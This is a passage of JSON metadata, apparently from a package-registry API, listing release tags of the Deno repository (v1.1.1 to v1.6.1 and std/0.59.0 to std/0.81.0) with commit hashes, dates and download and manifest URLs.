0:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g